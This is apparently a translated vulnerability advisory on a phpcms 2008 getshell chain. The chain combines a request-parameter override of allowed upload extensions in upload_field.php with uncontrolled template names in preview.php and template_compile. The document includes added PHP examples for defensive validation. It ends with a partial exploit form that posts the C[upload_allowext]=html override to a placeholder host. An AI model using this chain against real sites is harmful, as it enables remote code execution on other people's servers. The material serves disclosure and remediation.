phpcms foreground (and background permission) getshell 1 - vulnerability warning - the black bar safety net

2014-01-30T00:00:00
ID MYHACK58:62201442046
Type myhack58
Reporter Anonymous (佚名)
Modified 2014-01-30T00:00:00

Description

1. First the foreground part; presumably a lot of sites are already patching. For phpcms 2008, this is a secondary analysis of a getshell in the two-stage (second-order) attack category.

In upload_field.php:

$upload_allowext = !empty($C['upload_allowext']) ? $C['upload_allowext'] : $info['upload_allowext'];
// vulnerability trigger point: through variable coverage, $upload_allowext is assigned the value "html"
$upload_maxsize = !empty($C['upload_maxsize']) ? $C['upload_maxsize'] : $info['upload_maxsize']*1024;
$isthumb = isset($C['thumb_enable']) ? $C['thumb_enable'] : ($PHPCMS['thumb_enable'] && $info['isthumb'] ? 1 : 0);
$iswatermark = isset($C['watermark_enable']) ? $C['watermark_enable'] : ($PHPCMS['watermark_enable'] && $info['iswatermark'] ? 1 : 0);
$thumb_width = isset($width) ? $width : (isset($C['thumb_width']) ? $C['thumb_width'] : ($info['thumb_width'] ? $info['thumb_width'] : $PHPCMS['thumb_width']));
$thumb_height = isset($height) ? $height : (isset($C['thumb_height']) ? $C['thumb_height'] : ($info['thumb_height'] ? $info['thumb_height'] : $PHPCMS['thumb_height']));
$watermark_img = PHPCMS_ROOT.($info['watermark_img'] ? $info['watermark_img'] : $PHPCMS['watermark_img']);
$attachment = new attachment($mod); // instantiate the attachment upload class
if($dosubmit)
{
    $attachment->upload($uploadtext, $upload_allowext, $upload_maxsize, 1);
    // vulnerability trigger point: follow the attachment upload class
}

Here we can pass ?C[upload_allowext]=html&C[upload_maxsize]=1024000 to overwrite the allowed upload type and upload a malicious file of our choosing. PHP and similar types cannot be uploaded directly (follow the attachment class file to see why), but HTML can be uploaded.
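The override works because the allowed-extension list is read from request-controlled data ($C) before the server-side setting. The following PHP is an added example, not code from phpcms or from this article: it resolves the list from trusted configuration only and checks an uploaded file name against it, rejecting active content such as .html and .php regardless of what the configuration says. The names $server_config, $mod_info, UPLOAD_DENY_EXT and the test inputs are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not phpcms code. Decides which upload extensions are allowed
// from trusted, server-side configuration only, so a request parameter such as
// C[upload_allowext] can never widen the list. Names here are illustrative.

// Extensions never accepted into a web-served upload directory, whatever the
// configuration says: anything the web server or the browser would execute.
const UPLOAD_DENY_EXT = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps',
    'html', 'htm', 'shtml', 'xhtml', 'svg', 'js', 'htaccess',
];

/**
 * Build the allow-list from the site configuration, falling back to the module
 * settings. The request is deliberately not consulted (contrast with reading $C
 * in upload_field.php). Entries on UPLOAD_DENY_EXT are dropped even if an
 * administrator added them.
 */
function resolve_upload_allowext(array $server_config, array $mod_info): array
{
    $raw  = $server_config['upload_allowext'] ?? $mod_info['upload_allowext'] ?? 'jpg|jpeg|gif|png';
    $list = [];
    foreach (explode('|', strtolower((string) $raw)) as $ext) {
        $ext = trim($ext, " .\t\r\n");
        if ($ext !== '' && !in_array($ext, UPLOAD_DENY_EXT, true)) {
            $list[] = $ext;
        }
    }
    return array_values(array_unique($list));
}

/**
 * Return every extension segment of a client-supplied file name, lower-cased:
 * "shell.php.jpg" gives ['php', 'jpg']. Checking all segments, not only the
 * last one, matters on servers that map a handler onto any extension in the name.
 */
function extension_segments(string $filename): array
{
    $base  = basename(str_replace('\\', '/', $filename));
    $parts = explode('.', $base);
    array_shift($parts);                       // drop the name before the first dot
    return array_map('strtolower', $parts);
}

/**
 * Accept an upload only if the size is within limit, the name has no NUL byte,
 * no extension segment is on the deny list, and the final extension is allowed.
 */
function upload_is_allowed(string $filename, int $size, array $allowext, int $maxsize): bool
{
    if ($size <= 0 || $size > $maxsize || strpos($filename, "\0") !== false) {
        return false;
    }
    $segments = extension_segments($filename);
    if ($segments === []) {
        return false;
    }
    foreach ($segments as $seg) {
        if (in_array($seg, UPLOAD_DENY_EXT, true)) {
            return false;
        }
    }
    return in_array(end($segments), $allowext, true);
}

function check(bool $cond, string $label): void
{
    echo ($cond ? 'ok   ' : 'FAIL ') . $label . PHP_EOL;
}

// Demonstration with constructed inputs; run as: php upload_check.php
$allow = resolve_upload_allowext(['upload_allowext' => 'jpg|gif|png|html'], []);
check($allow === ['jpg', 'gif', 'png'],                                'html dropped from configured list');
check(upload_is_allowed('photo.JPG', 2048, $allow, 1024000) === true,  'ordinary image accepted');
check(upload_is_allowed('page.html', 2048, $allow, 1024000) === false, 'html rejected');
check(upload_is_allowed('x.php.jpg', 2048, $allow, 1024000) === false, 'deny-listed inner segment rejected');
check(upload_is_allowed('noext', 2048, $allow, 1024000) === false,     'name without extension rejected');
check(upload_is_allowed('big.png', 5000000, $allow, 1024000) === false,'oversized upload rejected');
```

The size limit is likewise taken from a trusted source by the caller; the point of the example is that nothing derived from the request decides what the server will accept, so the C[...] override has nothing to overwrite.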

In preview.php at line 60:

$head['description'] = $r['description'];
if(!$template) $template = $C['template_show']; // variable coverage lets $template be overwritten
include template('phpcms', $template); // calls the template parsing function
// the template parsing method
function template($module = 'phpcms', $template = 'index', $istag = 0)
{
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile)))
    {
        require_once PHPCMS_ROOT.'include/template.func.php';
        template_compile($module, $template, $istag); // template parsing
    }
    return $compiledtplfile;
}
// follow the template_compile function

In template.func.php at line 2:

function template_compile($module, $template, $istag = 0)
{
    $tplfile = TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html'; // $template is controlled here
    $content = @file_get_contents($tplfile); // triggers the vulnerability: the constructed malicious file is parsed
    if($content === false) showmessage("$tplfile is not exists!");
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function tag'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
    $strlen = file_put_contents($compiledtplfile, $content);
    @chmod($compiledtplfile, 0777);
    return $strlen;
}

That concludes the analysis of this spot.
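Neither template() nor template_compile() above constrains $template before concatenating it into a file path, which is what lets an attacker-controlled name reach file_get_contents(). As an added example, not code from phpcms or from this article, the following PHP shows the two checks a fix would add: the template name is accepted only as a plain identifier, and the resolved file is confirmed to lie inside the template directory after realpath(). Function names, the temporary template tree and the sample names are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not phpcms code. Validates a template name before it is used
// in a path, and confirms the resolved file stays inside the template root.
// The template tree below is constructed in the system temp dir for the demo.

/**
 * Return $template unchanged if it is a plain identifier (letters, digits,
 * underscore, hyphen; at most 64 chars), otherwise null. A value containing
 * "../", "/" or a NUL byte therefore never reaches the path concatenation.
 */
function safe_template_name(string $template): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $template) === 1 ? $template : null;
}

/**
 * Resolve <tpl_dir>/<module>/<template>.html and return its real path, or null
 * if either name is invalid, the file does not exist, or the real path (after
 * symlink resolution) lies outside $tpl_dir.
 */
function resolve_template_file(string $tpl_dir, string $module, string $template): ?string
{
    $module   = safe_template_name($module);
    $template = safe_template_name($template);
    $root     = realpath($tpl_dir);
    if ($module === null || $template === null || $root === false) {
        return null;
    }
    $path = realpath($root . '/' . $module . '/' . $template . '.html');
    if ($path === false || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

function check(bool $cond, string $label): void
{
    echo ($cond ? 'ok   ' : 'FAIL ') . $label . PHP_EOL;
}

// Constructed template tree: <tmp>/tpl_demo_<pid>/phpcms/index.html, plus one
// file outside the tree standing in for an uploaded attachment.
$tpl_dir = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
$outside = sys_get_temp_dir() . '/tpl_demo_outside_' . getmypid() . '.html';
mkdir($tpl_dir . '/phpcms', 0700, true);
file_put_contents($tpl_dir . '/phpcms/index.html', '<h1>index</h1>');
file_put_contents($outside, 'not a template');

check(resolve_template_file($tpl_dir, 'phpcms', 'index') !== null,   'legitimate template resolves');
check(resolve_template_file($tpl_dir, 'phpcms', 'missing') === null, 'unknown template rejected');
check(resolve_template_file($tpl_dir, 'phpcms', '../../tpl_demo_outside_' . getmypid()) === null,
      'traversal in template name rejected by the identifier filter');
// The containment test is the second, independent line of defence: even with
// the name filter removed, a path that resolves outside the root fails it.
$root = realpath($tpl_dir);
check(strncmp(realpath($outside), $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0,
      'file outside the template root fails the prefix test');

unlink($outside);
unlink($tpl_dir . '/phpcms/index.html');
rmdir($tpl_dir . '/phpcms');
rmdir($tpl_dir);
```

Run it with php template_check.php. Keeping both checks is deliberate: the identifier filter stops the path from ever being built from attacker input, and the realpath prefix test catches anything the filter does not anticipate, such as a symlink inside the template directory pointing at an upload.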

Finally, the exp is as follows:

<form action="http://xxx.com/upload_field.php?C[upload_allowext]=html&C[upload_maxsize]=1024000&uinfo=1" method="post" enctype="multipart/form-data"><!-- Modify the URL -->
